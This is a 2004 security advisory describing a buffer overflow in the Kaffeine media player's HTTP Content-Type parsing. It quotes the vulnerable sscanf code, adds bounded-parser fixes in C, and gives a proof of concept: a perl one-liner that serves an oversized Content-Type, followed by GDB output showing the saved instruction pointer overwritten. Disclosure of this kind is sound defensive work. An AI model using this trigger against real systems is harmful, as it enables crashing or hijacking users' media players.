[UNIX] Kaffeine Media Player Content-Type Overflow

From: SecuriTeam (support_at_securiteam.com)
Date: 10/26/04

    To: list@securiteam.com
    Date: 26 Oct 2004 18:22:38 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

      Kaffeine Media Player Content-Type Overflow
    ------------------------------------------------------------------------

    SUMMARY

     <http://kaffeine.sourceforge.net/> Kaffeine is "a xine based media player
    for KDE3."

    A buffer overflow attack is possible in kaffeine by supplying a RealAudio
    media playlist file with an improper Content-Type field.

    DETAILS

    Vulnerable Systems:
     * Kaffeine versions 0.4.2 and above

    The vulnerability can be triggered by providing the application with a
    Real Audio Media (ram) playlist file whose Content-Type field is
    crafted to contain a very large value. The file type limitations are
    derived from the following code:

    PlayList::LoadRamPlaylist( const KURL& kurl, QListViewItem* after)
    ...
        /* check for ram playlist */
        if ( (ext == "ra") || (ext == "rm") || (ext == "ram") || (ext == "lsc") || (ext == "pl") )
        {
    ...

    The bug associated with this overflow is located in the following piece of
    code, taken from 'kaffeine-0.4.3b/kaffeine/http.c':
    static http_t *http_open (const char *mrl) {

      http_t *this;
    ...
        if (sscanf(this->buf, "Content-Type: %s", mime_type) == 1) {
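
    The defect above is the unbounded "%s" conversion: sscanf copies the
    whole Content-Type token into mime_type no matter how long it is. The
    following is an added example (written for this page, not Kaffeine's
    code) that places a parser of the same shape beside two bounded
    alternatives: a manual parser that rejects over-long values outright,
    and a sscanf variant whose "%s" carries a width derived from the
    destination size. The buffer size MIME_BUFSZ, the function names and
    the sample header lines are assumptions chosen for the example.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Assumed buffer size for the example; Kaffeine's real size is not on the page. */
#define MIME_BUFSZ 64

/* Same shape as the vulnerable pattern: "%s" has no width, so a value longer
 * than the destination writes past its end. Kept for contrast only; the
 * demonstration below only ever feeds it a short, well-formed header. */
int parse_content_type_unsafe(const char *line, char *mime_type)
{
    return sscanf(line, "Content-Type: %s", mime_type) == 1;
}

/* Hardened parser: 1 = parsed, 0 = header not present / empty,
 * -1 = value would not fit. Over-long values are rejected rather than
 * silently truncated, so the caller can fail closed. */
int parse_content_type(const char *line, char *out, size_t outsz)
{
    static const char prefix[] = "Content-Type:";
    const char *p;
    size_t len = 0;

    if (outsz == 0 || strncmp(line, prefix, sizeof prefix - 1) != 0)
        return 0;
    p = line + sizeof prefix - 1;
    while (*p == ' ' || *p == '\t')
        p++;
    /* the token ends at whitespace or end of line, exactly as "%s" would read it */
    while (p[len] != '\0' && !isspace((unsigned char)p[len]))
        len++;
    if (len == 0)
        return 0;
    if (len >= outsz)
        return -1;               /* no room for value plus NUL: reject */
    memcpy(out, p, len);
    out[len] = '\0';
    return 1;
}

/* Alternative that keeps sscanf: build "%<N>s" from the buffer size so the
 * conversion can never write more than outsz-1 bytes plus the NUL.
 * Note this variant truncates over-long values instead of rejecting them. */
int parse_content_type_scanf(const char *line, char *out, size_t outsz)
{
    char fmt[48];

    if (outsz < 2)
        return 0;
    snprintf(fmt, sizeof fmt, "Content-Type: %%%zus", outsz - 1);
    return sscanf(line, fmt, out) == 1;
}

/* Constructed header whose value has the shape used in the advisory's test
 * (316 'A' followed by "ZZZZABCD"); returns 1 if the bounded parser rejects it. */
int long_header_rejected(void)
{
    char line[400];
    char mime[MIME_BUFSZ];
    size_t n = strlen("Content-Type: ");

    memcpy(line, "Content-Type: ", n);
    memset(line + n, 'A', 316);
    memcpy(line + n + 316, "ZZZZABCD", 9);   /* 9 bytes copies the NUL too */
    return parse_content_type(line, mime, sizeof mime) == -1;
}

int main(void)
{
    char mime[MIME_BUFSZ];
    /* constructed sample, matching the first response in the advisory's log */
    const char *hdr = "Content-Type: text/plain;";

    if (parse_content_type_unsafe(hdr, mime))
        printf("unsafe parser, short value: '%s'\n", mime);
    if (parse_content_type(hdr, mime, sizeof mime) == 1)
        printf("bounded parser, short value: '%s'\n", mime);
    printf("bounded parser rejects 324-byte value: %d\n", long_header_rejected());
    return 0;
}
```

    The manual parser is the safer default: a Content-Type that does not
    fit the buffer is not a value the player can act on anyway, and
    refusing it keeps an oversize header from reaching any later copy.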

    A simple proof of concept would be to modify the Content-Type entry in
    /etc/mime.types for the ram extension, setting it to a very long string:
    AAAAAAAAAAAAA ............. A
    instead of the usual name audio/x-pn-realaudio. Example:

    linux:/srv/www/htdocs # echo `perl -e 'print "A" x 316 . "ZZZZABCD"'` ram
    > /etc/mime.types ; /etc/init.d/apache2 restart
    Syntax OK
    Shutting down httpd2 (waiting for all children to terminate) done
    Starting httpd2 (prefork)

    [root@threat root]# kaffeine http://192.168.1.207/test.pl
    http: content length = 30 bytes
    http: content type = 'text/plain;'
    http: content length = 0 bytes
    http: content type =
    'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAZZZZABCD'
    [root@threat root]# KCrash: Application 'kaffeine' crashing...

    Then, create a sample RealMedia file (.rm) and allow your webserver to
    offer the file via HTTP. Kaffeine will attempt to download and play the
    file and the Content-Type header received will be copied to a small
    buffer, hence causing an overflow. Of course, another trigger is to view
    the file directly with Kaffeine. The output from GDB looks similar to
    this:
    (gdb) c
    Continuing.
    http: content length = 30 bytes
    http: content type = 'text/plain;'
    http: content length = 0 bytes
    http: content type =
    'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAZZZZABCD'

    Program received signal SIGSEGV, Segmentation fault.
    [Switching to Thread -150400896 (LWP 2328)]
    0x080b869c in SubtitleChooser::staticMetaObject ()
    (gdb) bt
    #0 0x080b869c in SubtitleChooser::staticMetaObject ()
    #1 0x5a5a5a5a in ?? ()
    #2 0x44434241 in ?? ()
    #3 0x097a1200 in ?? ()
    #4 0x00000000 in ?? ()
    #5 0x00000000 in ?? ()
    #6 0x00000000 in ?? ()
    #7 0x00000000 in ?? ()
    #8 0xfef17b28 in ?? ()
    #9 0x09794b70 in ?? ()
    #10 0x05f04ac0 in kde_malloc_is_used () from /usr/lib/libkdecore.so.4
    #11 0x00000018 in ?? ()
    #12 0x05f04ac0 in kde_malloc_is_used () from /usr/lib/libkdecore.so.4
    #13 0x096c3770 in ?? ()
    #14 0x096c3760 in ?? ()
    #15 0x05f04ac0 in kde_malloc_is_used () from /usr/lib/libkdecore.so.4
    #16 0xfef17b48 in ?? ()
    #17 0x05ec8dea in malloc () from /usr/lib/libkdecore.so.4
    Previous frame inner to this frame (corrupt stack?)

    (gdb) i f
    Stack level 0, frame at 0xfef17ae0:
     eip = 0x80b869c in SubtitleChooser::staticMetaObject(); saved eip
    0x5a5a5a5a
     called by frame at 0xfef17ae4
     Arglist at 0xfef17ad8, args:
     Locals at 0xfef17ad8, Previous frame's sp is 0xfef17ae0
     Saved registers:
      ebp at 0xfef17ad8, eip at 0xfef17adc

    0xfeea9b20: 'A' <repeats 200 times>...
    0xfeea9be8: 'A' <repeats 116 times>, "ZZZZABCD"

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:kfinisterre@secnetops.biz>
    KF.

